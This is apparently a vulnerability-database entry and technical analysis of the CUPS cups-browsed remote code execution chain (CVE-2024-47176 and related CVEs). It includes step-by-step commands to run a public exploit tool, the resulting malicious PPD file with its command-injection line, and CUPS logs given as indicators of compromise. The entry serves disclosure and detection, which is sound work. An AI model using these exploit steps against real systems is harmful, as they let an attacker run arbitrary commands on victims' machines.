Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
1

CVE-2024-47176

Disclosure Date: September 26, 2024
CVE-2024-47176 CVSS v3 Base Score: 8.3
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

CUPS is a standards-based, open-source printing system, and cups-browsed contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. cups-browsed binds to INADDR_ANY:631, causing it to trust any packet from any source, and can cause the Get-Printer-Attributes IPP request to an attacker controlled URL.

Due to the service binding to *:631 ( INADDR_ANY ), multiple bugs in cups-browsed can be exploited in sequence to introduce a malicious printer to the system. This chain of exploits ultimately enables an attacker to execute arbitrary commands remotely on the target machine without authentication when a print job is started. This poses a significant security risk over the network. Notably, this vulnerability is particularly concerning as it can be exploited from the public internet, potentially exposing a vast number of systems to remote attacks if their CUPS services are enabled.

Add Assessment

2
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
UnauthenticatedVulnerable in default configurationRequires user interaction
Technical Analysis

Overview

On September 26, 2024, technical details of a four-vulnerability exploit chain affecting the Common UNIX Printing System (CUPS) were disclosed.

The four vulnerabilities and their affected components are as follows, with the CVSS and CWE values as assigned by the CNA.

CVE Affected Component CVSS CWE
CVE-2024-47176 cups-browsed 8.3 (High) Binding to an Unrestricted IP Address (CWE-1327), Improper Input Validation (CWE-20), Exposed Dangerous Method or Function (CWE-749)
CVE-2024-47076 libcupsfilters 8.6 (High) Improper Input Validation (CWE-20)
CVE-2024-47175 libppd 8.6 (High) Improper Input Validation (CWE-20)
CVE-2024-47177 cups-filters 9.0 (Critical) Command Injection (CWE-ID)

The exploit chain achieves arbitrary code execution as follows.

First, a remote unauthenticated attacker can leverage CVE-2024-47176 to add a new attacker-controlled printer to a vulnerable target system. The attacker-controlled printer in this case will not be a physical printer, but rather a software endpoint on the attacker’s machine that emulates a printer. This can be achieved by a remote attacker either directly accessing UDP port 631, which is bound by the vulnerable /usr/sbin/cups-browsed service on all network interfaces, and as such is potentially reachable from the public internet, or by a remote unauthenticated attacker leveraging zero-configuration networking such as multicast DNS (mDNS). In the later scenario, the attacker must be on the same network segment as the target in order to transmit multicast packets that will be received by the target.

Next, due to the improper input validation issues in both CVE-2024-47076 and CVE-2024-47175, attacker-controlled data that originates from an Internet Printing Protocol (IPP) response that the attacker controls is then written to a PostScript Printer Description (PPD) file. This PPD file will contain a malicious FoomaticRIPCommandLine entry. Finally CVE-2024-47177 will allow for command injection to occur when a new print job is sent to the malicious printer.

For a full analysis of the affected components, the original finder, Simone Margaritelli (a.k.a. evilsocket), has a detailed write up on their blog, along with their original vulnerability report and PoC here.

Ratings

When tagging and rating this vulnerability, I have considered the full exploit chain as it has been published, and as we currently understand the four vulnerabilities in question to work.

I have added the tag “Vulnerable in default configuration”, as the Ubuntu 22.04 system I was testing was vulnerable in a default configuration. However, depending on the target system, this may change, e.g. some server installations of Linux may not run any of the CUPS services, so they will not be vulnerable in a default configuration.

I have added the tag “Unauthenticated”, as the remote attacker does not require any authentication on the target systems to successfully exploit this vulnerability.

I have added the tag “Requires user interaction”, as the current public exploit chain for CVE-2024-47176 + CVE-2024-47076 + CVE-2024-47175 + CVE-2024-47177 does indeed require user interaction. A user must manually send a new print job to a malicious printer for the exploit chain to achieve arbitrary code execution.

Due to the above I have rated both the Attacker Value and the Exploitability as Medium.

Example Exploitation

A public exploit is available here. We can demonstrate successful exploitation against a default install of Ubuntu 22.04 by an attacker on the same LAN segment as the target.

First on the attacker’s machine we perform the following steps to advertise a malicious printer on the LAN via mDNS.

# Clone the exploit code
git clone https://github.com/RickdeJager/cupshax
cd cupshax
# Install dependencies
pip install zeroconf
pip install ippserver
# Allow port 4444 in our firewall, so IPP request from a target can succeed
sudo ufw allow 4444
# Run the exploit, passing in out own IP address
python3 cupshax.py --ip 192.168.86.42 --name printerhax1 --port 4444 --command "echo hax > /tmp/printerhax1"
# The exploit will advertise a malicious printer over the LAN via mDNS. If a target user submits a print job to this printer, the attacker's command will execute on the target system.

On the target system, no user interaction is required to have the malicious printer added to the target system. However, for the attacker to execute an arbitrary command, user interaction must occur. A user on the target system must send a print job to the malicious printer. To demonstrate this, a user can open an editor such as gedit, and print the current document to the malicious printer named printerhax1.

We can verify exploitation has succeeded as follows, noting that the user account is the lp user.

$ ls -al /tmp/*hax*
-rw------- 1 lp lp 4 Sep 27 15:14 /tmp/printerhax1

$ id lp
uid=7(lp) gid=7(lp) groups=7(lp)

IOCs

After exploitation, there are several IOCs that may be present (assuming an attacker has not removed them).

The malicious PPD file will be written to the location /etc/cups/ppd/ during exploitation. However, the file may be removed by CUPS (and regenerated as needed), so it may not be present after exploitation. We can examine the PPD file for the malicious printer named printerhax1, noting it contains the command injection string *FoomaticRIPCommandLine: echo hax > /tmp/printerhax1;#

$ ls -al /etc/cups/ppd/
total 12
drwxr-xr-x 2 root lp 4096 Sep 27 15:34 .
drwxr-xr-x 5 root lp 4096 Sep 27 15:34 ..
-rw-r----- 1 root lp 1933 Sep 27 15:34 printerhax1.ppd

$ sudo cat /etc/cups/ppd/printerhax1.ppd 
*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*FileVersion: "2.4"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PSVersion: "(3010.000) 0"
*LanguageLevel: "3"
*FileSystem: False
*PCFileName: "ippeve.ppd"
*Manufacturer: "printerhax1"
*ModelName: "0.00"
*Product: "(0.00)"
*NickName: "0.00 - IPP Everywhere"
*ShortNickName: "0.00 - IPP Everywhere"
*ColorDevice: False
*cupsVersion: 2.4
*cupsSNMPSupplies: False
*cupsLanguages: "en_IE"
*cupsFilter2: "application/vnd.cups-pdf application/pdf 10 -"
*OpenUI *PageSize: PickOne
*OrderDependency: 10 AnySetup *PageSize
*DefaultPageSize: A4
*PageSize A4: "<</PageSize[595.275590551181 841.889763779528]>>setpagedevice"
*CloseUI: *PageSize
*OpenUI *PageRegion: PickOne
*OrderDependency: 10 AnySetup *PageRegion
*DefaultPageRegion: A4
*PageRegion A4: "<</PageSize[595.275590551181 841.889763779528]>>setpagedevice"
*CloseUI: *PageRegion
*DefaultImageableArea: A4
*DefaultPaperDimension: A4
*ImageableArea A4: "18 36 577.275590551181 805.889763779528"
*PaperDimension A4: "595.275590551181 841.889763779528"
*OpenUI *MediaType: PickOne
*OrderDependency: 10 AnySetup *MediaType
*DefaultMediaType: Unknown
*MediaType Stationery: "<</MediaType(Stationery)>>setpagedevice"
*en_IE.MediaType Stationery/Stationery: ""
*MediaType : HAX
*FoomaticRIPCommandLine: echo hax : "<</MediaType(: HAX
*FoomaticRIPCommandLine: echo hax )>>setpagedevice"
*en_IE.MediaType : HAX
*FoomaticRIPCommandLine: echo hax /: HAX
*FoomaticRIPCommandLine: echo hax > /tmp/printerhax1;#
*cupsFilter2: "application/vnd.cups-pdf application/pdf 0 foomatic-rip"
*%: ""
*CloseUI: *MediaType
*DefaultResolution: 300dpi
*OpenUI *cupsPrintQuality: PickOne
*OrderDependency: 10 AnySetup *cupsPrintQuality
*en_IE.Translation cupsPrintQuality/Print Quality: ""
*DefaultcupsPrintQuality: Normal
*cupsPrintQuality Normal: "<</HWResolution[300 300]>>setpagedevice"
*en_IE.cupsPrintQuality Normal/Normal: ""
*CloseUI: *cupsPrintQuality

The file /var/log/cups/error_log will contain error information related to a failed filter job.

$ cat /var/log/cups/error_log
E [27/Sep/2024:15:14:31 +0100] [Job 1] Job stopped due to filter errors; please consult the /var/log/cups/error_log file for details.
D [27/Sep/2024:15:14:31 +0100] [Job 1] The following messages were recorded from 15:14:14 to 15:14:31
D [27/Sep/2024:15:14:31 +0100] [Job 1] Applying default options...
D [27/Sep/2024:15:14:31 +0100] [Job 1] File of type application/pdf queued by "testuser".
D [27/Sep/2024:15:14:31 +0100] [Job 1] hold_until=0
D [27/Sep/2024:15:14:31 +0100] [Job 1] Queued on "printerhax1" by "testuser".
D [27/Sep/2024:15:14:31 +0100] [Job 1] time-at-processing=1727446454
D [27/Sep/2024:15:14:31 +0100] [Job 1] 3 filters for job:
D [27/Sep/2024:15:14:31 +0100] [Job 1] pdftopdf (application/pdf to application/vnd.cups-pdf, cost 66)
D [27/Sep/2024:15:14:31 +0100] [Job 1] foomatic-rip (application/vnd.cups-pdf to printer/printerhax1/application/pdf, cost 0)
D [27/Sep/2024:15:14:31 +0100] [Job 1] - (printer/printerhax1/application/pdf to printer/printerhax1, cost 0)
D [27/Sep/2024:15:14:31 +0100] [Job 1] job-sheets=none,none
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[0]="printerhax1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[1]="1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[2]="testuser"
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[3]="Untitled Document 1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[4]="1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[5]="job-originating-user-name=testuser MediaType= job-priority=50 number-up=1 noCollate PageSize=A4 job-sheets=none,none job-uuid=urn:uuid:2a670b29-9298-3177-7472-7ca69b9201d9 job-originating-host-name=localhost date-time-at-creation= date-time-at-processing= time-at-creation=1727446454 time-at-processing=1727446454 job-impressions-completed=0"
D [27/Sep/2024:15:14:31 +0100] [Job 1] argv[6]="/var/spool/cups/d00001-001"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[0]="CUPS_CACHEDIR=/var/cache/cups"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[1]="CUPS_DATADIR=/usr/share/cups"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[2]="CUPS_DOCROOT=/usr/share/cups/doc-root"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[3]="CUPS_REQUESTROOT=/var/spool/cups"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[4]="CUPS_SERVERBIN=/usr/lib/cups"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[5]="CUPS_SERVERROOT=/etc/cups"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[6]="CUPS_STATEDIR=/run/cups"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[7]="HOME=/var/spool/cups/tmp"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[8]="PATH=/usr/lib/cups/filter:/usr/bin:/usr/sbin:/bin:/usr/bin"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[9]="SERVER_ADMIN=root@sfewer-ubuntu-test"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[10]="SOFTWARE=CUPS/2.4.1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[11]="TMPDIR=/var/spool/cups/tmp"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[12]="USER=root"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[13]="CUPS_MAX_MESSAGE=2047"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[14]="CUPS_SERVER=/run/cups/cups.sock"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[15]="CUPS_ENCRYPTION=IfRequested"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[16]="IPP_PORT=631"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[17]="CHARSET=utf-8"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[18]="LANG=en_IE.UTF-8"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[19]="PPD=/etc/cups/ppd/printerhax1.ppd"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[20]="CONTENT_TYPE=application/pdf"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[21]="DEVICE_URI=ipp://printerhax1.local:4444/printers/hax"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[22]="PRINTER_INFO=printerhax1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[23]="PRINTER_LOCATION="
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[24]="PRINTER=printerhax1"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[25]="PRINTER_STATE_REASONS=none"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[26]="CUPS_FILETYPE=document"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[27]="FINAL_CONTENT_TYPE=application/pdf"
D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[28]="AUTH_I****"
D [27/Sep/2024:15:14:31 +0100] [Job 1] Started filter /usr/lib/cups/filter/pdftopdf (PID 6419)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Started filter /usr/lib/cups/filter/foomatic-rip (PID 6420)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Started backend /usr/lib/cups/backend/ipp (PID 6421)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Calling FindDeviceById(cups-printerhax1)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Failed to send: org.freedesktop.ColorManager.NotFound:device id \'cups-printerhax1\' does not exist
D [27/Sep/2024:15:14:31 +0100] [Job 1] Failed to get find device cups-printerhax1
D [27/Sep/2024:15:14:31 +0100] [Job 1] \'CM Color Calibration\' Mode in SPOOLER-LESS: Off
D [27/Sep/2024:15:14:31 +0100] [Job 1] Getting input from file 
D [27/Sep/2024:15:14:31 +0100] [Job 1] foomatic-rip version 1.28.15 running...
D [27/Sep/2024:15:14:31 +0100] [Job 1] Parsing PPD file ...
D [27/Sep/2024:15:14:31 +0100] [Job 1] Added option PageSize
D [27/Sep/2024:15:14:31 +0100] [Job 1] Added option ImageableArea
D [27/Sep/2024:15:14:31 +0100] [Job 1] Sending stdin for job...
D [27/Sep/2024:15:14:31 +0100] [Job 1] Added option PaperDimension
D [27/Sep/2024:15:14:31 +0100] [Job 1] Added option MediaType
D [27/Sep/2024:15:14:31 +0100] [Job 1] Added option Resolution
D [27/Sep/2024:15:14:31 +0100] [Job 1] Added option cupsPrintQuality
D [27/Sep/2024:15:14:31 +0100] [Job 1] Parameter Summary
D [27/Sep/2024:15:14:31 +0100] [Job 1] -----------------
D [27/Sep/2024:15:14:31 +0100] [Job 1] Spooler: cups
D [27/Sep/2024:15:14:31 +0100] [Job 1] Printer: printerhax1
D [27/Sep/2024:15:14:31 +0100] [Job 1] Shell: /bin/sh
D [27/Sep/2024:15:14:31 +0100] [Job 1] PPD file: /etc/cups/ppd/printerhax1.ppd
D [27/Sep/2024:15:14:31 +0100] [Job 1] ATTR file: 
D [27/Sep/2024:15:14:31 +0100] [Job 1] Printer model: 0.00 - IPP Everywhere
D [27/Sep/2024:15:14:31 +0100] [Job 1] Job title: Untitled Document 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] File(s) to be printed:
D [27/Sep/2024:15:14:31 +0100] [Job 1] <STDIN>
D [27/Sep/2024:15:14:31 +0100] [Job 1] Ghostscript extra search path (\'GS_LIB\'): /usr/share/cups/fonts
D [27/Sep/2024:15:14:31 +0100] [Job 1] Printing system options:
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'job-originating-user-name=testuser\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option job-originating-user-name=testuser.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'job-priority=50\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option job-priority=50.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'number-up=1\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option number-up=1.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'noCollate\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown boolean option \"noCollate\".
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'job-sheets=none,none\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option job-sheets=none,none.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'job-uuid=urn:uuid:2a670b29-9298-3177-7472-7ca69b9201d9\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option job-uuid=urn:uuid:2a670b29-9298-3177-7472-7ca69b9201d9.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'job-originating-host-name=localhost\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option job-originating-host-name=localhost.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'date-time-at-creation=\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option date-time-at-creation=.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'date-time-at-processing=\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option date-time-at-processing=.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'time-at-creation=1727446454\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option time-at-creation=1727446454.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'time-at-processing=1727446454\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option time-at-processing=1727446454.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'job-impressions-completed=0\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Unknown option job-impressions-completed=0.
D [27/Sep/2024:15:14:31 +0100] [Job 1] CM Color Calibration Mode in CUPS: Off
D [27/Sep/2024:15:14:31 +0100] [Job 1] Options from the PPD file:
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'MediaType=\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Pondering option \'PageSize=A4\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] ================================================
D [27/Sep/2024:15:14:31 +0100] [Job 1] File: <STDIN>
D [27/Sep/2024:15:14:31 +0100] [Job 1] ================================================
D [27/Sep/2024:15:14:31 +0100] [Job 1] STATE: +connecting-to-device
D [27/Sep/2024:15:14:31 +0100] [Job 1] Looking up \"printerhax1.local\"...
D [27/Sep/2024:15:14:31 +0100] [Job 1] STATE: -connecting-to-device
D [27/Sep/2024:15:14:31 +0100] [Job 1] printerhax1.local=192.168.86.42
D [27/Sep/2024:15:14:31 +0100] [Job 1] backendWaitLoop(snmp_fd=5, addr=0x5651dfc47368, side_cb=0x5651df842c50)
D [27/Sep/2024:15:14:31 +0100] [Job 1] pdftopdf: Last filter determined by the PPD: -; FINAL_CONTENT_TYPE: application/pdf => pdftopdf will log pages in page_log.
D [27/Sep/2024:15:14:31 +0100] [Job 1] PDF interactive form and annotation flattening done via QPDF
D [27/Sep/2024:15:14:31 +0100] [Job 1] pdftopdf: \"print-scaling\" IPP attribute: auto
D [27/Sep/2024:15:14:31 +0100] [Job 1] pdftopdf: Print scaling mode: Do not scale, center, crop if needed
D [27/Sep/2024:15:14:31 +0100] [Job 1] After Cropping: 595.275574 841.889771 595.275574 841.889771
D [27/Sep/2024:15:14:31 +0100] [Job 1] PAGE: 1 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] Filetype: PDF
D [27/Sep/2024:15:14:31 +0100] [Job 1] PostScript option found: PageSize=A4: \"<</PageSize[595.275590551181 841.889763779528]>>setpagedevice\"
D [27/Sep/2024:15:14:31 +0100] [Job 1] Driver does not understand PDF input, converting to PostScript
D [27/Sep/2024:15:14:31 +0100] [Job 1] Storing temporary files in /tmp
D [27/Sep/2024:15:14:31 +0100] [Job 1] PID 6419 (/usr/lib/cups/filter/pdftopdf) exited with no errors.
D [27/Sep/2024:15:14:31 +0100] [Job 1] File contains 1 pages.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Starting process \"pdf-to-ps\" (generation 1)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Printer make and model: printerhax1 0.00
D [27/Sep/2024:15:14:31 +0100] [Job 1] Running command line for pstops: pstops 1 testuser \'Untitled Document 1\' 1 \' job-originating-user-name=testuser MediaType= job-priority=50 PageSize=A4 job-sheets=none,none job-uuid=urn:uuid:2a670b29-9298-3177-7472-7ca69b9201d9 job-originating-host-name=localhost date-time-at-creation= date-time-at-processing= time-at-creation=1727446454 time-at-processing=1727446454 job-impressions-completed=0\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] Using image rendering resolution 300 dpi
D [27/Sep/2024:15:14:31 +0100] [Job 1] Running command line for gs: gs -q -dNOPAUSE -dBATCH -dSAFER -dNOMEDIAATTRS -sstdout=%stderr -sDEVICE=ps2write -dShowAcroForm -sOUTPUTFILE=%stdout -sProcessColorModel=DeviceGray -sColorConversionStrategy=Gray -dLanguageLevel=3 -r300 -dCompressFonts=false -dNoT3CCITT -dNOINTERPOLATE -c \'save pop\' -f /tmp/foomatic-P4LVq9
D [27/Sep/2024:15:14:31 +0100] [Job 1] Started filter gs (PID 6426)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Started filter pstops (PID 6427)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Page = 595x842; 18,36 to 577,806
D [27/Sep/2024:15:14:31 +0100] [Job 1] slow_collate=0, slow_duplex=0, slow_order=0
D [27/Sep/2024:15:14:31 +0100] [Job 1] Before copy_comments - %!PS-Adobe-3.0
D [27/Sep/2024:15:14:31 +0100] [Job 1] %!PS-Adobe-3.0
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%Invocation: gs -q -dNOPAUSE -dBATCH -dSAFER -dNOMEDIAATTRS -sstdout=? -sDEVICE=ps2write -dShowAcroForm -sOUTPUTFILE=? -sProcessColorModel=DeviceGray -sColorConversionStrategy=Gray -dLanguageLevel=3 -r300 -dCompressFonts=false -dNoT3CCITT -dNOINTERPOLATE ?
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%+ ? -f ?
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%BoundingBox: 0 0 596 842
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%HiResBoundingBox: 0 0 596.00 842.00
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%Creator: GPL Ghostscript 9550 (ps2write)
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%LanguageLevel: 2
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%CreationDate: D:20240927151414+01\'00\'
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%Pages: 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] %%EndComments
D [27/Sep/2024:15:14:31 +0100] [Job 1] Before copy_prolog - %%BeginProlog
D [27/Sep/2024:15:14:31 +0100] [Job 1] Filetype: PostScript
D [27/Sep/2024:15:14:31 +0100] [Job 1] Reading PostScript input ...
D [27/Sep/2024:15:14:31 +0100] [Job 1] --> This document is DSC-conforming!
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found %RBINumCopies: 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] -----------
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%BeginProlog
D [27/Sep/2024:15:14:31 +0100] [Job 1] Inserting option code into \"Prolog\" section.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Before copy_setup - %%Page: 1 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] Before page loop - %%Page: 1 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] Copying page 1...
D [27/Sep/2024:15:14:31 +0100] [Job 1] pagew = 559.3, pagel = 769.9
D [27/Sep/2024:15:14:31 +0100] [Job 1] bboxx = 0, bboxy = 0, bboxw = 595, bboxl = 841
D [27/Sep/2024:15:14:31 +0100] [Job 1] PageLeft = 18.0, PageRight = 577.3
D [27/Sep/2024:15:14:31 +0100] [Job 1] PageTop = 805.9, PageBottom = 36.0
D [27/Sep/2024:15:14:31 +0100] [Job 1] PageWidth = 595.3, PageLength = 841.9
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%EndProlog
D [27/Sep/2024:15:14:31 +0100] [Job 1] -----------
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%BeginSetup
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%BeginFeature: *MediaType 
D [27/Sep/2024:15:14:31 +0100] [Job 1] Option: MediaType=
D [27/Sep/2024:15:14:31 +0100] [Job 1] --> Option will be set by PostScript interpreter
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%BeginFeature: *PageSize A4
D [27/Sep/2024:15:14:31 +0100] [Job 1] Option: PageSize=A4
D [27/Sep/2024:15:14:31 +0100] [Job 1] --> Option will be set by PostScript interpreter
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%BeginFeature: *cupsPrintQuality Normal
D [27/Sep/2024:15:14:31 +0100] [Job 1] Option: cupsPrintQuality=Normal
D [27/Sep/2024:15:14:31 +0100] [Job 1] --> Option will be set by PostScript interpreter
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%EndSetup
D [27/Sep/2024:15:14:31 +0100] [Job 1] -----------
D [27/Sep/2024:15:14:31 +0100] [Job 1] New page: %%Page: 1 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] \"Setup\" section is missing, inserting it.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Inserting option code into \"Setup\" section.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Found: %%BeginPageSetup
D [27/Sep/2024:15:14:31 +0100] [Job 1] Inserting option code into \"PageSetup\" section.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Wrote 1 pages...
D [27/Sep/2024:15:14:31 +0100] [Job 1] PID 6427 (pstops) exited with no errors.
D [27/Sep/2024:15:14:31 +0100] [Job 1] PID 6426 (gs) exited with no errors.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Flushing FIFO.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Starting renderer with command: \"echo hax > /tmp/printerhax1;#\"
D [27/Sep/2024:15:14:31 +0100] [Job 1] Starting process \"kid3\" (generation 1)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Starting process \"kid4\" (generation 2)
D [27/Sep/2024:15:14:31 +0100] [Job 1] Starting process \"renderer\" (generation 2)
D [27/Sep/2024:15:14:31 +0100] [Job 1] renderer exited with status 0
D [27/Sep/2024:15:14:31 +0100] [Job 1] JCL: \033%-12345X@PJL
D [27/Sep/2024:15:14:31 +0100] [Job 1] <job data> 
D [27/Sep/2024:15:14:31 +0100] [Job 1] Process is dying with \"Encountered error Broken pipe during fwrite\", exit stat 1
D [27/Sep/2024:15:14:31 +0100] [Job 1] Cleaning up...
D [27/Sep/2024:15:14:31 +0100] [Job 1] Killing pdf-to-ps
D [27/Sep/2024:15:14:31 +0100] [Job 1] kid4 exited with status 0
D [27/Sep/2024:15:14:31 +0100] [Job 1] kid3 finished
D [27/Sep/2024:15:14:31 +0100] [Job 1] Killing kid3
D [27/Sep/2024:15:14:31 +0100] [Job 1] PID 6420 (/usr/lib/cups/filter/foomatic-rip) stopped with status 1.
D [27/Sep/2024:15:14:31 +0100] [Job 1] Hint: Try setting the LogLevel to "debug" to find out more.
D [27/Sep/2024:15:14:31 +0100] [Job 1] PID 6421 (/usr/lib/cups/backend/ipp) exited with no errors.
D [27/Sep/2024:15:14:31 +0100] [Job 1] End of messages
D [27/Sep/2024:15:14:31 +0100] [Job 1] printer-state=3(idle)
D [27/Sep/2024:15:14:31 +0100] [Job 1] printer-state-message="Filter failed"
D [27/Sep/2024:15:14:31 +0100] [Job 1] printer-state-reasons=none

We can see above that the line D [27/Sep/2024:15:14:31 +0100] [Job 1] envp[21]="DEVICE_URI=ipp://printerhax1.local:4444/printers/hax" details the IPP request to the remote attacker’s malicious printer.

We can also see that the line D [27/Sep/2024:15:14:31 +0100] [Job 1] Starting renderer with command: \"echo hax > /tmp/printerhax1;#\" details the arbitrary OS command used during the command injection.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
8.3 High
Impact Score:
6
Exploitability Score:
1.6
Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
High
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
cups-browsed = 2.0.1
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • OpenPrinting

Products

  • cups-browsed
Technical Analysis